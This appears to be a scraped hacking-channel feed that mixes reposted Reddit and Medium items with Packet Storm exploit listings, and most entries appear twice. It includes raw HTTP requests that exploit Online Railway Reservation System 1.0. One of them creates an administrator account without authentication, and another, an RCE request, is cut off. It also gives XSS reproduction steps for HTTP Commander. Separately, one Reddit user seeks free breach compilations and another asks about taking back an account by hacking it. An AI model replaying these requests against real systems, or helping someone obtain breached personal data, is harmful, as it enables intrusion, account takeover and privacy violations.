hacking: security in practice
Is it legal to take back my own account?
Tldr below^
I have had a minecraft account that's been mine since 2010, I played it on multiple servers, but mostly singleplayer. In 2016 I quit the game for some time to focus on personal matters and early 2017 I receiced notice from various servers that my account was banned for "suspicious activities". Tried logging in but the credentials were different. The emailaddress bound to it had different credentials as well, when I finally got back my emailaddress everything was wiped and so was my account. I just want the name of the account back, I don't care for any values on the account, just the name accountname because of a private server world I no longer have my things in.
Since the company and customer service are being complete ass about helping me recover the account, I'm thinking about other ways to get it back. Whoever stole the account probably still has it, but it appears to not be used anymore. Since I'm not allowed to prove it's mine, can I rightfully steal back what's mine?
Tldr: Someone stole my account and wiped his traces clean, since customer support won't help me, can I 'steal' back my account without getting in legal trouble?
submitted by /u/SirLeonardo20
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Is it legal to take back my own account?
Tldr below^
I have had a minecraft account that's been mine since 2010, I played it on multiple servers, but mostly singleplayer. In 2016 I quit the game for some time to focus on personal matters and early 2017 I receiced notice from various servers that my account was banned for "suspicious activities". Tried logging in but the credentials were different. The emailaddress bound to it had different credentials as well, when I finally got back my emailaddress everything was wiped and so was my account. I just want the name of the account back, I don't care for any values on the account, just the name accountname because of a private server world I no longer have my things in.
Since the company and customer service are being complete ass about helping me recover the account, I'm thinking about other ways to get it back. Whoever stole the account probably still has it, but it appears to not be used anymore. Since I'm not allowed to prove it's mine, can I rightfully steal back what's mine?
Tldr: Someone stole my account and wiped his traces clean, since customer support won't help me, can I 'steal' back my account without getting in legal trouble?
submitted by /u/SirLeonardo20
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Is it legal to take back my own account?
Tldr below^^ I have had a minecraft account that's been mine since 2010, I played it on multiple servers, but mostly singleplayer. In 2016 I quit...
hacking: security in practice
Does anyone know of a reliable subreddit or forum one can find breach compilations
I recently discovered the h8mail tool (yes i'm new) but the only good compilation that I didn't have to pay for with a forum currency of some sort was the COMB breach. This made me wonder if there is any place one could find more specific breaches like the PDL Customer breach for example. Any help would be appreciated
submitted by /u/Pippin_42
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Does anyone know of a reliable subreddit or forum one can find breach compilations
I recently discovered the h8mail tool (yes i'm new) but the only good compilation that I didn't have to pay for with a forum currency of some sort was the COMB breach. This made me wonder if there is any place one could find more specific breaches like the PDL Customer breach for example. Any help would be appreciated
submitted by /u/Pippin_42
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Does anyone know of a reliable subreddit or forum one can find...
I recently discovered the h8mail tool (yes i'm new) but the only good compilation that I didn't have to pay for with a forum currency of some sort...
Must-Have Tools For Hacking
https://www.reddit.com/r/redteamsec/comments/s0lpta/musthave_tools_for_hacking/
submitted by /u/banginpadr (https://www.reddit.com/user/banginpadr)
[link] (https://infosecwriteups.com/must-have-tools-for-hacking-c2b75b332d2c) [comments] (https://www.reddit.com/r/redteamsec/comments/s0lpta/musthave_tools_for_hacking/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/redteamsec/comments/s0lpta/musthave_tools_for_hacking/
submitted by /u/banginpadr (https://www.reddit.com/user/banginpadr)
[link] (https://infosecwriteups.com/must-have-tools-for-hacking-c2b75b332d2c) [comments] (https://www.reddit.com/r/redteamsec/comments/s0lpta/musthave_tools_for_hacking/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
Must-Have Tools For Hacking
Posted in r/redteamsec by u/banginpadr • 3 points and 0 comments
Install cf-check on Kali Linux
https://medium.com/@sherlock297/install-cf-check-on-kali-linux-ae6f79c5681f?source=rss------bug_bounty-5
cf-check : check if an Host is owned by CloudFlare or not.Continue reading on Medium » (https://medium.com/@sherlock297/install-cf-check-on-kali-linux-ae6f79c5681f?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@sherlock297/install-cf-check-on-kali-linux-ae6f79c5681f?source=rss------bug_bounty-5
cf-check : check if an Host is owned by CloudFlare or not.Continue reading on Medium » (https://medium.com/@sherlock297/install-cf-check-on-kali-linux-ae6f79c5681f?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
Medium
Install cf-check on Kali Linux
cf-check : check if an Host is owned by CloudFlare or not.
Euler launches $1M ImmuneFi Bug Bounty Programme!
The ImmuneFi Bug Bounty programme aims to strengthen Euler’s security while boosting collaboration with the greater DeFi ecosystem as part…Continue reading on Euler »
Read more...
The ImmuneFi Bug Bounty programme aims to strengthen Euler’s security while boosting collaboration with the greater DeFi ecosystem as part…Continue reading on Euler »
Read more...
Install cf-check on Kali Linux
cf-check : check if an Host is owned by CloudFlare or not.Continue reading on Medium »
Read more...
cf-check : check if an Host is owned by CloudFlare or not.Continue reading on Medium »
Read more...
Cross-Origin Resource Sharing (CORS) Misconfiguration leads to User’s PII leaks.
Hello everyone,Continue reading on Medium »
Read more...
Hello everyone,Continue reading on Medium »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Online Railway Reservation System 1.0 Remote Code Execution
https://4.bp.blogspot.com/-mkcU-A73eZ4/WWlu7eKaHEI/AAAAAAAAIJY/m_4841aOwNcKGKR9ykgWprFWjwy04TKNACLcBGAs/s1600/h11.png
Online Railway Reservation System version 1.0 suffers from an unauthenticated remote code execution vulnerability.
MD5 |
Download
#Exploit Title: Online Railway Reservation System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
#Date: 07/01/2022
#Exploit Author: Zachary Asher
#Vendor Homepage: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html
#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/orrs.zip
#Version: 1.0
#Tested on: Online Railway Reservation System 1.0
=====================================================================================================================================
Command Execution
=====================================================================================================================================
POST /orrs/classes/SystemSettings.php?f=update_settings HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------41914587873111789572282654447
Content-Length: 164
-----------------------------41914587873111789572282654447
Content-Disposition: form-data; name="content[welcome]"
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Online Railway Reservation System 1.0 Remote Code Execution
https://4.bp.blogspot.com/-mkcU-A73eZ4/WWlu7eKaHEI/AAAAAAAAIJY/m_4841aOwNcKGKR9ykgWprFWjwy04TKNACLcBGAs/s1600/h11.png
Online Railway Reservation System version 1.0 suffers from an unauthenticated remote code execution vulnerability.
MD5 |
d7d2280f276cd5c3f64ef785cdf71ac6Download
#Exploit Title: Online Railway Reservation System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
#Date: 07/01/2022
#Exploit Author: Zachary Asher
#Vendor Homepage: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html
#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/orrs.zip
#Version: 1.0
#Tested on: Online Railway Reservation System 1.0
=====================================================================================================================================
Command Execution
=====================================================================================================================================
POST /orrs/classes/SystemSettings.php?f=update_settings HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------41914587873111789572282654447
Content-Length: 164
-----------------------------41914587873111789572282654447
Content-Disposition: form-data; name="content[welcome]"
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Online Railway Reservation System 1.0 Remote Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Online Railway Reservation System 1.0 Missing Access Control
https://2.bp.blogspot.com/-TEKdvnpzXEU/WWlu-1G01LI/AAAAAAAAIJ8/FsoklfFFqiwHwKy6Rf6U36sgF7K28-hPgCLcBGAs/s1600/h118.png
Online Railway Reservation System version 1.0 suffers from an administrative account creation vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Online Railway Reservation System 1.0 Missing Access Control
https://2.bp.blogspot.com/-TEKdvnpzXEU/WWlu-1G01LI/AAAAAAAAIJ8/FsoklfFFqiwHwKy6Rf6U36sgF7K28-hPgCLcBGAs/s1600/h118.png
Online Railway Reservation System version 1.0 suffers from an administrative account creation vulnerability.
MD5 |
f2d1bce831fb6d7cf35634e3999ff1c2Download
#Exploit Title: Online Railway Reservation System 1.0 - Admin Account Creation (Unauthenticated)
#Date: 07/01/2022
#Exploit Author: Zachary Asher
#Vendor Homepage: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html
#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/orrs.zip
#Version: 1.0
#Tested on: Online Railway Reservation System 1.0
=====================================================================================================================================
Account Creation
=====================================================================================================================================
POST /orrs/classes/Users.php?f=save HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------344736580936503100812880815036
Content-Length: 602
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="firstname"
testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="lastname"
testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="username"
testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="password"
testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="type"
1
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Online Railway Reservation System 1.0 Missing Access Control
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
VUPlayer 2.49 Buffer Overflow
https://4.bp.blogspot.com/-gp6vAY2GXMM/WWlvG3cWkQI/AAAAAAAAILY/aMDesAGFEocqJU-7SaIaO870_Bbf2ZUHACLcBGAs/s1600/h139.png
VUPlayer version 2.49 .wax local buffer overflow exploit with DEP bypass.
MD5 |
Download
# Exploit Title: VUPlayer 2.49 - '.wax' Local Buffer Overflow (DEP Bypass)
# Date: 26/06/2021
# Exploit Author: Bryan Leong
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
VUPlayer 2.49 Buffer Overflow
https://4.bp.blogspot.com/-gp6vAY2GXMM/WWlvG3cWkQI/AAAAAAAAILY/aMDesAGFEocqJU-7SaIaO870_Bbf2ZUHACLcBGAs/s1600/h139.png
VUPlayer version 2.49 .wax local buffer overflow exploit with DEP bypass.
MD5 |
53e64485c577d217ccced27894c8003aDownload
# Exploit Title: VUPlayer 2.49 - '.wax' Local Buffer Overflow (DEP Bypass)
# Date: 26/06/2021
# Exploit Author: Bryan Leong
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
VUPlayer 2.49 Buffer Overflow
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Linux unix GC Memory Corruption
https://3.bp.blogspot.com/-UEPmQpzFyCs/WWlvQSuTgiI/AAAAAAAAINA/LFaHvgtClFA67K--PZO5ZJSS69Dsl8UBACLcBGAs/s1600/h31.png
Linux suffers from a garbage collection memory corruption vulnerability by resurrecting a file reference through RCU.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Linux unix GC Memory Corruption
https://3.bp.blogspot.com/-UEPmQpzFyCs/WWlvQSuTgiI/AAAAAAAAINA/LFaHvgtClFA67K--PZO5ZJSS69Dsl8UBACLcBGAs/s1600/h31.png
Linux suffers from a garbage collection memory corruption vulnerability by resurrecting a file reference through RCU.
MD5 |
78b6ea0bece0d083ab283dbd9b1ddddcDownload
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Linux unix GC Memory Corruption
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
HTTP Commander 3.1.9 Cross Site Scripting
https://3.bp.blogspot.com/-D2NV3HnXxpM/WWlu9YoBNhI/AAAAAAAAIJs/rLrqFdeLLWYSGUQPyN0O7DuhnXu7T_FjQCLcBGAs/s1600/h114.png
HTTP Commander version 3.1.9 suffers from a persistent cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
HTTP Commander 3.1.9 Cross Site Scripting
https://3.bp.blogspot.com/-D2NV3HnXxpM/WWlu9YoBNhI/AAAAAAAAIJs/rLrqFdeLLWYSGUQPyN0O7DuhnXu7T_FjQCLcBGAs/s1600/h114.png
HTTP Commander version 3.1.9 suffers from a persistent cross site scripting vulnerability.
MD5 |
6bb7f0bab3b4b05843b6af6b797dc597Download
# Exploit Title: HTTP Commander 3.1.9 - Stored Cross Site Scripting (XSS)
# Date: 07/01/2022
# Exploit Author: Oscar Sandén
# Vendor Homepage: https://www.element-it.com
# Software Link: https://www.element-it.com/downloads.aspx
# Version: 3.1.9
# Tested on: Windows Server 2016
[Description]
There is a stored XSS in the 'Zip content' feature of the HTTP commander application. The vulnerable field is the filename of the files inside the zip. This vulnerability exists in 3.x of the HTTP commander application.
[Steps to reproduce]
1) Create a file with a xxs payload in its name. Examples:
x .txt
x .txt
Or some other JS you like.
2) Zip the files
3) Upload the ZIP-file
4) In HTTP commander, right click the file and select ZIP-content.
5) If the files are in a subfolder, expand it until the filenames are shown.
[Exploit]
touch payload/x .txt
Zip -r test.zip /payload
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
HTTP Commander 3.1.9 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.